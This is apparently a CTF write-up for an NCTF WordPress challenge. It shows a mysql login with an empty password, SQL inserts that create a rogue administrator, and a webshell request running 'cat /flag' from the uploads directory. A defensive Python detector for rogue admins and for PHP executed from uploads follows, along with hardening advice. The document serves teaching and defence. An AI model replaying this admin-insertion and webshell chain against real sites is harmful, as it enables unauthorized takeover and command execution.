NCTF(wordpress)

Posted on 2020-11-22, 1 min read

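I was busy playing Xiangyun Cup the whole time, so I'm reproducing this challenge after the competition.
Looking through the posts on the WordPress site, one of them contains a mysql command that connects to port 8500: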
mysql -h 42.192.72.11 -P 8500 -uwww-data
Log in with an empty password, then add a WordPress user:

insert into wp_users values("3","guoke","$P$BBtFr9ZBqq5klH.gVcG.bZlbjWV9gn.","guoke","guoke@qq.com","http://59.110.157.4:8000/wordpress","2020-11-13 03:49:26","",0,"guoke");
insert into wp_usermeta values("25","3","wp_capabilities",'a:1:{s:13:"administrator";b:1;}');
insert into wp_usermeta values("26","3","wp_userlevel","10");

Once in the admin dashboard, upload a one-line webshell through the plugin feature.
wordpress/wp-content/uploads/2020/11/test1.php?1=cat /flag
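
The chain above leaves two artifacts a defender can look for: an administrator row in wp_usermeta that nobody provisioned, and a request that runs PHP from wp-content/uploads. The following is an added example, not part of the original post. The function names, the admin allowlist, the combined access-log format and all sample rows and log lines are assumptions constructed for illustration.

```python
import re

# An enabled role inside WordPress's PHP-serialized capabilities value,
# e.g. a:1:{s:13:"administrator";b:1;}
ROLE_RE = re.compile(r's:\d+:"([a-z_]+)";b:1;')
# A request for a .php file under wp-content/uploads, a directory meant for media.
UPLOAD_PHP_RE = re.compile(
    r'"(?:GET|POST) (\S*/wp-content/uploads/\S*?\.php)(\?\S*)? HTTP', re.I)

def rogue_admins(usermeta_rows, known_admin_ids, prefix="wp_"):
    """User IDs that hold the administrator role but are not on the allowlist.

    usermeta_rows: (umeta_id, user_id, meta_key, meta_value) tuples exported
    from the usermeta table; prefix is the site's table prefix.
    """
    admins = set()
    for _umeta_id, user_id, key, value in usermeta_rows:
        if key == prefix + "capabilities" and "administrator" in ROLE_RE.findall(value or ""):
            admins.add(int(user_id))
    return sorted(admins - set(known_admin_ids))

def uploads_php_hits(log_lines):
    """(client_ip, path, query) for each logged request that ran PHP from uploads."""
    hits = []
    for line in log_lines:
        m = UPLOAD_PHP_RE.search(line)
        if m:
            hits.append((line.split(" ", 1)[0], m.group(1), (m.group(2) or "")[1:]))
    return hits

# Constructed sample data for illustration.
ADMIN = 'a:1:{s:13:"administrator";b:1;}'
SAMPLE_USERMETA = [
    (10, 1, "wp_capabilities", ADMIN),                             # expected admin
    (18, 2, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    (25, 3, "wp_capabilities", ADMIN),                             # row added directly in SQL
    (26, 3, "wp_userlevel", "10"),
]
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Nov/2020:03:40:02 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 2410',
    '198.51.100.7 - - [13/Nov/2020:03:41:10 +0000] "GET /wordpress/wp-content/uploads/2020/11/a.jpg HTTP/1.1" 200 5120',
    '203.0.113.5 - - [13/Nov/2020:04:02:11 +0000] "GET /wordpress/wp-content/uploads/2020/11/test1.php?1=cat%20/flag HTTP/1.1" 200 38',
]

if __name__ == "__main__":
    print("unexpected administrators:", rogue_admins(SAMPLE_USERMETA, {1}))
    for hit in uploads_php_hits(SAMPLE_LOG):
        print("PHP executed from uploads:", hit)
```

Both findings point at the fixes: the database account should require a password and not be reachable from the internet, and the web server should not execute PHP from the uploads directory.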
